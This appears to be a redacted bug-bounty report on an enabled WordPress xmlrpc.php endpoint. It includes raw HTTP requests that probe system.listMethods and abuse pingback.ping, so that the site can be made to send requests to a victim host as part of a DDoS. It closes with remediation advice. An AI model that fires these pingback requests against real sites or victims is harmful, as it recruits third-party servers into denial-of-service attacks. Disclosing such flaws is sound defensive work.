Application level DoS via xmlrpc.php

Application level DoS via xmlrpc.php

 

Vulnerability description:

Wordpress that have xmlrpc.php enabled for pingbacks, trackbacks, etc. can be made as a part of a huge botnet causing a major DDOS. The website https://████/ has the xmlrpc.php file enabled and could thus be potentially used for such an attack against other victim hosts.

Vulnerable links: https://█████/xmlrpc.php

In order to determine whether the xmlrpc.php file is enabled or not, using the Repeater tab in Burp, send the request below.

POST /xmlrpc.php HTTP/1.1
Host: ███
Accept: /
Accept-Language: en
Connection: close
Content-Length: 93

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

Impact

Notice that a successful response is received showing that the xmlrpc.php file is enabled.
Now, considering the domain https://██████/ the xmlrpc.php file discussed above could potentially be abused to cause a DDOS attack against a victim host. This is achieved by simply sending a request that looks like below.

POST /xmlrpc.php HTTP/1.1
Host: ██████
Accept: /
Accept-Language: en
Connection: close
Content-Length: 235

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>http://██████/</string></value>
</param>
<param>
<value><string>https://███████/</string></value>
</param>
</params>
</methodCall>

As soon as the above request is sent, the victim host (█████████) gets an entry in its log file with a request originating from the https://█████/ domain verifying the pingback.

Remediation:

If the XMLRPC.php file is not being used, it should be disabled and removed completely to avoid any potential risks. Otherwise, it should at the very least be blocked from external access.